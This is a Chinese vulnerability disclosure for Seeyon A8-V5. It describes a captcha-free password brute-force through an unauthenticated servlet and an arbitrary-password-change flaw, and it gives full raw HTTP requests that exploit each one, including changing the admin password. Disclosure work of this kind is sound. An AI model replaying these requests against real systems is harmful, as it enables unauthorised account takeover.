致远A8-V5存在任意用户密码修改漏洞

### 简要描述： 致远A8-V5存在两个漏洞 一是无视验证码撞库 二是任意用户密码修改 ### 详细说明： 一是无视验证码撞库 致远A8-V5在设计时存在逻辑错误，用户修改密码时对原密码进行了验证，但是验证使用的服务存在未授权访问漏洞，系统对非合法请求的原密码验证功能进行回应，导致了无视验证码，无需login页面进行密码尝试 二是任意用户密码修改 致远A8-V5在设计时存在逻辑错误，在上一步对原始密码进行验证后，下一步不再检测原始密码，从而直接修改用户密码，导致平行权限的越权漏洞。 ### 漏洞证明： 一是无视验证码撞库 POST穷举用户和密码代码如下 ``` GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0 Accept: */* Accept-Language: zh-cn Referer: http://a8v51.seeyon.com/seeyon/individualManager.do?method=managerFrame requesttype: AJAX Content-Type: application/x-www-form-urlencoded Cookie: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: a8v51.seeyon.com DNT: 1 Proxy-Connection: Keep-Alive ``` [<img src="https://images.seebug.org/upload/201503/311021300ed4a6762c7a98096b4e47d09bcaa81a.png" alt="pojie.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311021300ed4a6762c7a98096b4e47d09bcaa81a.png) 显示true为该用户密码正确，轮询P_1_String参数即可撞库。 二是任意用户密码修改 在上一步完成之后，页面调转到提交修改请求页面 POST如下数据 ``` POST /seeyon/individualManager.do?method=modifyIndividual HTTP/1.0 Accept: text/html, application/xhtml+xml, */* Referer: http://a8v51.seeyon.com/seeyon/individualManager.do?method=managerFrame Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive Pragma: no-cache Content-Length: 86 DNT: 1 Host: a8v51.seeyon.com Cookie: JSESSIONID=DA71A65B3AAD45823A1FADAB80A3E685; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849,1419232608; avatarImageUrl=8469117046183055270; loginPageURL="/main.do" individualName=admin&formerpassword=123456&nowpassword=wy123456&validatepass=wy123456 ``` individualName为用户名 注意，此处需要以一个合法的JSESSIONID发送如上数据即可修改任意用户密码，合法的JSESSIONID由撞库得出。 本次证明演示中修改的用户为admin，修改为wy123456